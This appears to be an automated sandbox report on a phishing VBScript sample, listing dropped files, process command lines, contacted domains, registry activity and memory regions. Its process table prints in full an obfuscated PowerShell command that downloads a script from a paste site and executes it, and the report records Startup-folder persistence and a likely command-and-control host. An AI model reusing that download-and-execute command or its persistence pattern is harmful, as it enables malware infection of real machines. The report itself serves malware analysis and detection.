Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Re-RFQ - PN List.vbs
|
UTF-8 Unicode text, with very long lines, with CRLF line terminators
|
initial sample
|
||
C:\Users\Public\gia9ab2dg0.PS1
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs
|
C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 61480 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs
|
C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
|
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES14F3.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ce, 9 symbols
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESC9E1.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g4lgrl3.ws0.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbucvlc.1j2.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1efweqf.5aa.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrik5clw.pjd.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzpdbdk.wsu.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
|
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.out
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.MEqVT+yD.20220516192930.txt
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.RBBMNgBb.20220516193001.txt
|
UTF-8 Unicode (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.f5mU45le.20220516192941.txt
|
UTF-8 Unicode (with BOM) text, with CRLF line terminators
|
dropped
|
There are 19 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest]
$Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse();
[System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader
$Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32));
[System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command
+ $FilePath)
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp"
"c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp"
"c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
|
There are 3 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://textbin.net/raw/gia9ab2dg0
|
148.72.177.212
|
||
https://textbin.net
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
sky01.publicvm.com
|
|||
https://textbin.net/raw/gia9ab2dg00y
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
textbin.net
|
148.72.177.212
|
||
sky01.publicvm.com
|
91.193.75.216
|
||
SQL8003.site4now.net
|
199.102.48.248
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
148.72.177.212
|
textbin.net
|
United States
|
||
192.168.2.1
|
unknown
|
unknown
|
||
91.193.75.216
|
sky01.publicvm.com
|
Serbia
|
||
199.102.48.248
|
SQL8003.site4now.net
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Description\Microsoft\Rpc\UuidTemporaryData
|
NetworkAddress
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Description\Microsoft\Rpc\UuidTemporaryData
|
NetworkAddressLocal
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\LastConnect
|
SQL8003.site4now.net
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum
|
Version
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
3351000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
2464EE2D000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
24667561000
|
heap
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
2464FAFF000
|
trusted library allocation
|
page read and write
|
||
2464FBD5000
|
trusted library allocation
|
page read and write
|
||
2465EC34000
|
trusted library allocation
|
page read and write
|
||
1D38E3D0000
|
trusted library allocation
|
page read and write
|
||
1D39DE83000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
1D38E80B000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
1D3A6611000
|
heap
|
page read and write
|
||
1D38E8A7000
|
trusted library allocation
|
page read and write
|
||
1B3C4BF7000
|
trusted library allocation
|
page read and write
|
||
1B3B54C8000
|
trusted library allocation
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1CA57910000
|
heap
|
page read and write
|
||
1D3A6B20000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667510000
|
trusted library allocation
|
page read and write
|
||
1D3A6987000
|
heap
|
page read and write
|
||
1D99E7F3000
|
heap
|
page read and write
|
||
170BF828000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
20531C10000
|
direct allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
24667159000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
1D99E8F0000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1B3B49E1000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
2B019E85000
|
heap
|
page read and write
|
||
2521A100000
|
heap
|
page read and write
|
||
1D99E7FF000
|
heap
|
page read and write
|
||
542AFFE000
|
stack
|
page read and write
|
||
15CB0A70000
|
heap
|
page read and write
|
||
1D99E82D000
|
heap
|
page read and write
|
||
246674E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
AB29D7B000
|
stack
|
page read and write
|
||
1D3A67B0000
|
trusted library allocation
|
page read and write
|
||
AB2987E000
|
stack
|
page read and write
|
||
135E000
|
stack
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
1C9E1FEC000
|
heap
|
page read and write
|
||
5880000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9A0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D38C32C000
|
heap
|
page read and write
|
||
2B019E8F000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1220000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
68E13B5000
|
stack
|
page read and write
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
2052EDE0000
|
heap
|
page read and write
|
||
1D38C2F3000
|
heap
|
page read and write
|
||
C4263FC000
|
stack
|
page read and write
|
||
24667830000
|
trusted library allocation
|
page read and write
|
||
1B3CCF34000
|
heap
|
page read and write
|
||
7FFEBCB3A000
|
trusted library allocation
|
page read and write
|
||
1C9E3F18000
|
heap
|
page read and write
|
||
17F303CE000
|
heap
|
page read and write
|
||
1C9E3E09000
|
heap
|
page read and write
|
||
1D38E02F000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1B3B49A1000
|
trusted library allocation
|
page read and write
|
||
1B3CD204000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
205308F0000
|
heap
|
page read and write
|
||
4AF91FF000
|
stack
|
page read and write
|
||
2052EF28000
|
heap
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
2405A830000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2ECB000
|
trusted library allocation
|
page execute and read and write
|
||
17F303CE000
|
heap
|
page read and write
|
||
2ED70AB0000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D9A146B000
|
direct allocation
|
page read and write
|
||
1CA585AC000
|
heap
|
page read and write
|
||
7FFEBCC20000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1C9E3EBD000
|
heap
|
page read and write
|
||
1B3B5881000
|
trusted library allocation
|
page read and write
|
||
2521A000000
|
heap
|
page read and write
|
||
7FFEBCB63000
|
trusted library allocation
|
page read and write
|
||
1B3B47F0000
|
heap
|
page execute and read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1D3A699B000
|
heap
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
2B019D40000
|
heap
|
page read and write
|
||
1CA58564000
|
heap
|
page read and write
|
||
598E000
|
stack
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
246674E0000
|
trusted library allocation
|
page read and write
|
||
33C4000
|
trusted library allocation
|
page read and write
|
||
1B3B2DD0000
|
heap
|
page read and write
|
||
2052EF93000
|
heap
|
page read and write
|
||
2464EBC0000
|
heap
|
page execute and read and write
|
||
2464D0C8000
|
heap
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
1D3A6742000
|
trusted library allocation
|
page read and write
|
||
170BF886000
|
heap
|
page read and write
|
||
1B3CCECB000
|
heap
|
page read and write
|
||
246674A1000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB2A000
|
trusted library allocation
|
page read and write
|
||
1D3A67A0000
|
trusted library allocation
|
page read and write
|
||
1CA58590000
|
heap
|
page read and write
|
||
7FFEBCA40000
|
trusted library allocation
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
1D38E801000
|
trusted library allocation
|
page read and write
|
||
1C9E3EE1000
|
heap
|
page read and write
|
||
7FFEBCBB6000
|
trusted library allocation
|
page read and write
|
||
7FFEBC876000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A635E000
|
heap
|
page read and write
|
||
5872000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
A8C2CC5000
|
stack
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1C9E3A50000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
17F303E1000
|
heap
|
page read and write
|
||
5E40000
|
trusted library allocation
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1B3C4A41000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
2938AA4E000
|
heap
|
page read and write
|
||
1D3A67D0000
|
trusted library allocation
|
page read and write
|
||
3130000
|
trusted library allocation
|
page read and write
|
||
2ED70A40000
|
heap
|
page read and write
|
||
1B3B2D10000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
2405A670000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D99E920000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2464F56E000
|
trusted library allocation
|
page read and write
|
||
1CA57A57000
|
heap
|
page read and write
|
||
24667870000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA60000
|
trusted library allocation
|
page read and write
|
||
2464E940000
|
heap
|
page read and write
|
||
1CA58593000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB00000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page execute and read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
121AB36B000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB4F000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1CA5856B000
|
heap
|
page read and write
|
||
24667810000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC96D000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBB8000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA20000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D99E7BA000
|
heap
|
page read and write
|
||
7FFEBCC80000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
33B3000
|
trusted library allocation
|
page read and write
|
||
186E000
|
stack
|
page read and write
|
||
24667810000
|
trusted library allocation
|
page read and write
|
||
1C9E3F2F000
|
heap
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1B3B4990000
|
trusted library allocation
|
page read and write
|
||
1B3B3060000
|
heap
|
page readonly
|
||
FE0000
|
remote allocation
|
page read and write
|
||
1D99E7C1000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1D3A6AF0000
|
trusted library allocation
|
page read and write
|
||
2938AA4B000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
20531BB0000
|
direct allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1B3B49C1000
|
trusted library allocation
|
page read and write
|
||
1C9E3FC3000
|
heap
|
page read and write
|
||
2EE0000
|
trusted library allocation
|
page read and write
|
||
1C9E3E06000
|
heap
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA40000
|
trusted library allocation
|
page read and write
|
||
1CA58584000
|
heap
|
page read and write
|
||
7FFEBCAC0000
|
trusted library allocation
|
page read and write
|
||
1D3A67C0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
170BF841000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
5E60000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1B3B49C0000
|
trusted library allocation
|
page read and write
|
||
1D3A67C0000
|
trusted library allocation
|
page read and write
|
||
121AB300000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAC0000
|
trusted library allocation
|
page read and write
|
||
170BF700000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A62F0000
|
heap
|
page read and write
|
||
24667820000
|
trusted library allocation
|
page read and write
|
||
2464F833000
|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1CA58A19000
|
heap
|
page read and write
|
||
7FFEBC9B0000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1B3B2E2C000
|
heap
|
page read and write
|
||
1D3A6717000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1316000
|
heap
|
page read and write
|
||
542B1FE000
|
stack
|
page read and write
|
||
1B3B2EBD000
|
heap
|
page read and write
|
||
A1A8AFF000
|
stack
|
page read and write
|
||
20531D90000
|
direct allocation
|
page read and write
|
||
5621000
|
trusted library allocation
|
page read and write
|
||
7FFEBC930000
|
trusted library allocation
|
page read and write
|
||
1D38E7B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9E5000
|
trusted library allocation
|
page read and write
|
||
1D3A62C0000
|
trusted library allocation
|
page read and write
|
||
2052EF51000
|
heap
|
page read and write
|
||
1CA57A6D000
|
heap
|
page read and write
|
||
2052EF7F000
|
heap
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1CA58585000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2B019D30000
|
heap
|
page read and write
|
||
4351000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2464E9D0000
|
trusted library allocation
|
page read and write
|
||
1C9E3EAE000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7DF457130000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E680000
|
remote allocation
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667510000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
553376C000
|
stack
|
page read and write
|
||
246674C4000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1CA58584000
|
heap
|
page read and write
|
||
7FFEBC94D000
|
trusted library allocation
|
page read and write
|
||
1D38DE21000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB45000
|
trusted library allocation
|
page read and write
|
||
1D38C400000
|
heap
|
page read and write
|
||
1C9E3DA1000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D9A13C0000
|
direct allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
2464EAAD000
|
heap
|
page read and write
|
||
7FFEBC84C000
|
trusted library allocation
|
page execute and read and write
|
||
24667130000
|
trusted library allocation
|
page read and write
|
||
2466780D000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
63EE000
|
stack
|
page read and write
|
||
1D3A6B60000
|
trusted library allocation
|
page read and write
|
||
1B3B4CFB000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D38C480000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
170BF886000
|
heap
|
page read and write
|
||
1D3A6890000
|
trusted library allocation
|
page read and write
|
||
1C9E2076000
|
heap
|
page read and write
|
||
1C9E3EDE000
|
heap
|
page read and write
|
||
1D3A6B00000
|
trusted library allocation
|
page read and write
|
||
246674F0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2938A7A0000
|
heap
|
page read and write
|
||
1CA58500000
|
heap
|
page read and write
|
||
7FFEBC945000
|
trusted library allocation
|
page read and write
|
||
1D9A0130000
|
direct allocation
|
page read and write
|
||
6120000
|
trusted library allocation
|
page read and write
|
||
121AB395000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
33E1000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
B98DD7E000
|
stack
|
page read and write
|
||
A8C2DCE000
|
stack
|
page read and write
|
||
12D2000
|
heap
|
page read and write
|
||
AB29A77000
|
stack
|
page read and write
|
||
2052EF3C000
|
heap
|
page read and write
|
||
1D3A6720000
